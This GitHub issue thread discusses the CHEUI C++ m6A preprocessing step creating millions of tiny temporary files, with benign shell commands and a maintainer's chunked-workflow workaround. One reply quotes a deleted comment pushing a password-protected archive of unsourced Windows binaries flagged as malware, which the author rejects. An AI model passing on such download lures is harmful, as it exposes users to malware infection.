C++ preprocess (m6A) creates a large number of temporary files #43

Open
olliecheng opened this issue Sep 29, 2024 · 5 comments

@olliecheng

Hi all,

Not sure if this is a duplicate of #38.

I've been trying to get CHEUI up and running, but have hit an issue with the preprocessing step. I have been running the C++ preprocessing script (compiled with GCC v11.3 on RHEL 9.4, commit 7b422f7808a3c2ffff56a9ead33a199824753b4e) on an 858 GB nanopolish eventalign file, generated from a ~2 GB .fastq of reads.

In this instance, I noticed that the preprocessing script was producing an absurd number of temporary files - over 7 million before the HPC file quota ran out and the script was killed. (This was much to the chagrin of my university's HPC admin, and I promptly received a very strongly worded email advising me not to generate so many temporary files! 😅)

I've attached a small selection of ~1000 of these temporary files for debugging purposes, in case it's of interest. Each file seems to be very small - a few lines at most, based on my n = 10 sample.
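
For what it's worth, a quick way to reproduce the count and the line-length check would be something like the following (the output directory and filename pattern here are just guesses based on the name of the attached archive):

# Hypothetical output directory and filename pattern -- adjust to your own run.
# Count how many intermediate files have been produced so far:
find "$OUTPUT_DIR" -type f -name '*signals+IDs*' | wc -l

# Check the line counts of a small sample of them:
find "$OUTPUT_DIR" -type f -name '*signals+IDs*' | head -n 10 | xargs wc -l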

The aligned events file was generated using:

nanopolish eventalign -t {threads} \
    --reads {input.reads} \
    --bam {input.bam} \
    --genome {REF} \
    --scale-events --signal-index --samples --print-read-names > {output}

and I was calling preprocess using:

# must first be in this path, or else the program crashes
cd $PATH_TO_CHEUI_PREPROCESS_DIR

./CHEUI -i $INPUT -m ../../kmer_models/model_kmer.csv -n {threads} --m6A -o $OUTPUT

See the attached sample of temporary files below: out_A_signals+IDs.zip

Let me know if there's anything else that you need.
Ollie

@olliecheng
Author

olliecheng commented Sep 29, 2024

> maybe this will help
>
> redacted mega.co.nz link
>
> Password: changeme I put the necessary dlls in the archive

Sorry, I'm confused by this comment. I'm not sure how this is applicable, and I also don't want to run precompiled code with no source, especially on a shared HPC cluster. I'm also using RHEL v9.4 on the cluster, not Windows. Furthermore, VirusTotal flags x86_64-w64-ranlib.exe as malware. Are you affiliated with the Eyras computational RNA biology group?

@comprna comprna deleted a comment Sep 29, 2024
@EduEyras
Member

EduEyras commented Sep 29, 2024 via email

Did you check the possible solution given by @pre-mRNA?

> We apologise for the issue. CHEUI currently generates a large number of intermediate files. You can process POD5 files sequentially to predict model 1, e.g.:
>
> POD5 1 -> eventalign -> preprocess_m6a -> CHEUI model 1
>
> You can then delete the eventalign and preprocess files, and keep only the model 1 output.
>
> Before predicting model 2, you will need to merge and sort all the model 1 files.
>
> Hope this helps.
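
As a rough sketch, the per-chunk loop could look something like the following. The chunk layout, output file names, and the final sort key are assumptions rather than CHEUI's documented interface; the nanopolish and CHEUI preprocess flags mirror the invocations earlier in this thread.

# Sketch only: process one chunk of reads at a time and keep just the model 1 output.
WORKDIR="$PWD"

for READS in "$WORKDIR"/chunks/chunk_*.fastq; do
    CHUNK=$(basename "$READS" .fastq)

    # 1. eventalign for this chunk only
    nanopolish eventalign -t "$THREADS" \
        --reads "$READS" \
        --bam "$WORKDIR/aligned/${CHUNK}.bam" \
        --genome "$REF" \
        --scale-events --signal-index --samples --print-read-names \
        > "$WORKDIR/${CHUNK}.eventalign.txt"

    # 2. CHEUI preprocess, run from its own directory as noted above
    (cd "$PATH_TO_CHEUI_PREPROCESS_DIR" && \
        ./CHEUI -i "$WORKDIR/${CHUNK}.eventalign.txt" \
                -m ../../kmer_models/model_kmer.csv \
                -n "$THREADS" --m6A \
                -o "$WORKDIR/${CHUNK}_preprocess")

    # 3. ... run CHEUI model 1 on ${CHUNK}_preprocess here, writing ${CHUNK}_model1.txt ...

    # 4. delete the intermediates once the model 1 output for this chunk exists
    rm -f  "$WORKDIR/${CHUNK}.eventalign.txt"
    rm -rf "$WORKDIR/${CHUNK}_preprocess"
done

# Merge and sort all per-chunk model 1 outputs before running model 2
# (the sort key here is a placeholder -- check the order required by model 2).
sort -k1,1 -k2,2n "$WORKDIR"/chunk_*_model1.txt > "$WORKDIR/model1_sorted.txt"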

@olliecheng
Author

olliecheng commented Sep 30, 2024

Hi,

Thanks for your reply.

I have not tried it yet, as I am unsure how many intermediate files it would still generate. I also noticed that the solution above is for the Python preprocess script, while I am using the C++ one. I just wanted to first confirm whether the very small size of each temporary file (only a few lines each) is expected behaviour.
